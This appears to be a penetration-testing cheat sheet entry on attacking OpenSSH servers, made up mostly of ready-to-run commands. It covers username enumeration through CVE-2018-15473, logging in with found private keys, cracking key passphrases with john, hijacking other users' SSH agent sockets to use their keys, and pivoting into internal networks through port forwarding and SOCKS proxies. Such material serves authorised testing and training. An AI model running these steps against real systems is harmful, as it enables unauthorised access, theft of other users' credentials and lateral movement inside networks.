OpenSSH
What it is: The standard SSH server on virtually every Linux/Unix system. Direct exploits are rare in modern versions, but username enumeration, key-based attacks, and misconfigurations are common.
Default ports: 22
Vuln research:
Username enumeration (CVE-2018-15473)
OpenSSH < 7.7 — Determine valid usernames
python3 ssh_enum.py $IP -u root
python3 ssh_enum.py $IP -U users.txt
# Or Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers
SSH key exploitation
If you find a private key — Use it
# Found id_rsa in a share, web dir, or LFI:
chmod 600 id_rsa
ssh -i id_rsa user@$IP
# If passphrase protected:
ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
SSH agent forwarding hijack
If agent forwarding is enabled — Hijack other users' keys
# Find SSH agent sockets:
ls -la /tmp/ssh-*/
# If you find another user's socket:
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.XXXXX
ssh-add -l # List their keys
ssh user@other-host # Use their keys
SSH port forwarding abuse
If you have SSH access — Reach internal services
# Local forward (access internal service from your box):
ssh -L 8080:127.0.0.1:8080 user@$IP
# Now visit http://127.0.0.1:8080 on your machine
# Dynamic SOCKS proxy:
ssh -D 9050 user@$IP
# Configure proxychains to use 127.0.0.1:9050